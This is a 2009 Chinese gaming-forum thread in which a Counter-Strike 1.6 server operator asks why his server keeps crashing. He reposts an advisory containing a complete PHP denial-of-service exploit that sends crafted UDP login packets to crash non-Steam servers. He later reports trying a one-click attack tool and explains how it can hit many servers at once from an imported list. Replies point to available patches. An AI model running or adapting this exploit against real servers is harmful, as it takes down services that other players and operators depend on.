搜索
查看: 2978|回复: 6

遇到捣乱高手了——1.6服被炸?

[复制链接]
发表于 2009-2-5 22:43:24 | 显示全部楼层 |阅读模式 来自 中国–安徽–淮北
今天遇到一高手,僵尸服务器装了SXE7.4,强制。
服务器不到十分钟挂掉,重启后还是这样,当然有人故意捣乱,开始他不换ID,固定一个,封掉后很快换了一个IP地址。
肯定不是重新拨号那种,他换的很快,刚刚封掉,马上就进来,而且是另一个IP地址,IP起始段都不一样。
后来,他开始换ID进服,看不出是哪个人捣乱了。
难道1.6也有炸服?
不知道谁遇到过这个问题?
 楼主| 发表于 2009-2-5 22:44:27 | 显示全部楼层 来自 中国–安徽–淮北
控制台也没看出什么异常,日志中也没有特别的记录,不知道特征是什么,也不知道从何下手。
回复

使用道具 举报

 楼主| 发表于 2009-2-5 22:46:37 | 显示全部楼层 来自 中国–安徽–淮北
有人在我论坛发布了这样一则消息,不知道是不是可靠:
炸服问题,斑竹看下
异常条件处理失败错误

影响系统
Valve Software Half-Life Counter-Strike 1.6

不受影响系统

危害
远程攻击者可以利用漏洞对应用程序进行拒绝服务攻击。

攻击所需条件
攻击者必须访问Half-Life Counter-Strike。

漏洞信息
Half-Life Counter-Strike是一款流行的即时射击游戏。
Half-Life Counter-Strike不正确处理登录请求,远程攻击者可以利用漏洞对应用程序进行拒绝服务攻击。
提交恶意登录请求可触发此漏洞。

测试方法
----[  Counter Strike 1.6 Denial Of Service POC ... ITDefence.ru Antichat.ru ]

Counter Strike 1.6 Denial Of Service POC
Eugene Minaev underwater@itdefence.ru
Bug was found by Maxim Suhanov ( THE FUF )
works only with no-steam servers
___________________________________________________________________
____/  __ __ _______________________ _______  _______________    \  \    / .\  /  /_// //              /        \       \/      __       \   /__/   /
/ /     /_//              /\        /       /      /         /     /___/
\/        /              / /       /       /\     /         /         /
/        /               \/       /       / /    /         /__       // \       /    ____________/       /        \/    __________// /__    // /   
/\\      \_______/        \________________/____/  2007    /_//_/   // // \ \\                                                               // // /
.\ \\        -[     ITDEFENCE.ru Security advisory     ]-         // // / .
. \_\\________[________________________________________]_________//_//_/ . ./*

CS-dos exploit made by underwater

Bug was discovered by .FUF  

Big respect 2 Sax-mmS ( for html ) , Focs ( for his cs server  ) , SkvoznoY , Bug(O)R,Antichat.ru and Cup.su

*/



ini_set("display_errors","0");



function HELLO_PACKET()

{

$packet = pack("H*","FFFFFFFF");

$packet .= "TSource Engine Query";

$packet .= pack("H*","00");

return $packet;

}



function CHALLENGE_PACKET()

{

$packet = pack("H*","FFFFFFFF");

$packet .= "getchallenge valve";

$packet .= pack("H*","00");

return $packet;

}



function LOGIN_PACKET_4()

{

global $cookie;

global $password;

$packet = pack("H*","FFFFFFFF");

$packet .= "connect 47 ";

$packet .= $cookie.' "';

$packet .= '\prot\4\unique\-1\raw\valve\cdkey\d506d189cf551620a70277a3d2c55bb2" "';

$packet .= '\_cl_autowepswitch\1\bottomcolor\6\cl_dlmax\128\cl_lc\1\cl_lw\1\cl_updaterate\30\mod';

$packet .= 'el\gordon\name\Born to be pig (..)\topcolor\30\_vgui_menus\1\_ah\1\rate\3500\*fid\0\pass';

$packet .= 'word\\'.$password;

$packet .= pack("H*","220A0000EE02");

return $packet;

}



function LOGIN_PACKET_2()

{

global $cookie;

global $password;

$packet = pack("H*","FFFFFFFF");

$packet .= "connect 47 ";

$packet .= $cookie.' "';

$packet .= '\prot\2\raw\d506d189cf551620a70277a3d2c55bb2" "\_cl_autowepswitch\1\bott';

$packet .= 'omcolor\6\cl_dlmax\128\cl_lc\1\cl_lw\1\cl_updaterate\30\model\gordon\nam';

$packet .= 'e\Born to be pig (..)\topcolor\30\_vgui_menus\1\_ah\1\rate\3500\*fid\0\pass';

$packet .= 'word\\'.$password;

$packet .= pack("H*","22");

return $packet;

}



function dowork($host,$port,$password,$auth)

{

global $password;

global $cookie;

# connecting to target host

$fsock = fsockopen("udp://".$host,(int) $port,$errnum,$errstr,2);

if (!$fsock) die ($errstr);

else

{

# sending hello packet

fwrite ($fsock,HELLO_PACKET());

fread ($fsock,100);

# sending chalennge packet

fwrite ($fsock,CHALLENGE_PACKET());

# recieving cookies

$resp = fread($fsock,100);

# grab cookies from packet

$cookie = substr($resp,strpos($resp,"A00000000")+10);

$cookie = substr($cookie,0,strpos($cookie," "));

# sending login packet

if (!$auth) fwrite ( $fsock,LOGIN_PACKET_4());else fwrite ( $fsock,LOGIN_PACKET_2());

$resp = fread($fsock,100);

}

}



IF (isset($_POST['host']) && isset($_POST['port']))

{

IF (empty($_POST['pass'])) $password = "123";

else $password = $_POST['pass'];

$fserver = $_POST['host'];

$fport = $_POST['port'];

if (isset($_POST['auth'])) $fauth = true;else $fauth=false;

# we have to connect 2 times

$result = dowork($fserver,$fport,$password,$fauth);

$result = dowork($fserver,$fport,$password,$fauth);

# parsing result

echo "Exploit Sent";

}
复制代码----[ FROM RUSSIA WITH LOVE :: underWHAT?! , gemaglabin ]

厂商解决方案
目前没有解决方案提供:
http://www.valvesoftware.com/games.html

漏洞提供者
Maxim Suhanov

漏洞消息链接
http://www.securityfocus.com/bid/27159

漏洞消息标题
Half-Life Counter-Strike Login Denial of Service Vulnerability
回复

使用道具 举报

 楼主| 发表于 2009-2-5 23:28:53 | 显示全部楼层 来自 中国–安徽–淮北
晕死,真的找到炸1.6服的工具了,而且试用了,很厉害!
这个东西,要是没有对付手段,CS服务器算完了………………
炸弹使用简单,功能强大,运行程序后输入所需要攻击的CS服务器地址(和端口号连一起不用分开)按“开始”按钮即可,一般几秒钟内CS服务器就挂了。如果同时需要攻击多个CS服务器地址,可以把多个CS服务器地址保存为文本文件(存放格式也是和端口号连一起不用分开),然后按“导入服务器”按钮导入服务器地址列表,按“开始”按钮即可。
声明:本CS1.6炸弹只供大家研究测试的免费CS1.6远程攻击器,请勿滥用,否则后果自负。
回复

使用道具 举报

发表于 2009-2-6 00:13:57 | 显示全部楼层 来自 中国–辽宁–铁岭
火星的朋友你好
回复

使用道具 举报

 楼主| 发表于 2009-2-6 01:21:50 | 显示全部楼层 来自 中国–安徽–淮北
火星的朋友你好
ypf 发表于 2009-2-6 00:13

呵呵,版主老大别嘲笑我,最近忙,点通来的少。
看到论坛有补丁,很高兴,测试过,不是很理想:虽然服务器不会挂,但攻击时,玩家也进不去服务器,甚至刷不到服务器。
攻击工具我也找到了,这个工具很简单,按个开始就不停的发送登陆ID。
另外,2834版本的补丁不理想,还是常常刷不到服务器。
回复

使用道具 举报

发表于 2009-2-6 01:23:23 | 显示全部楼层 来自 中国–福建–漳州
HLDS 技术讨论区 都已经发布补丁很久了
回复

使用道具 举报

游客
回复
您需要登录后才可以回帖 登录 | 注个册吧

快速回复 返回顶部 返回列表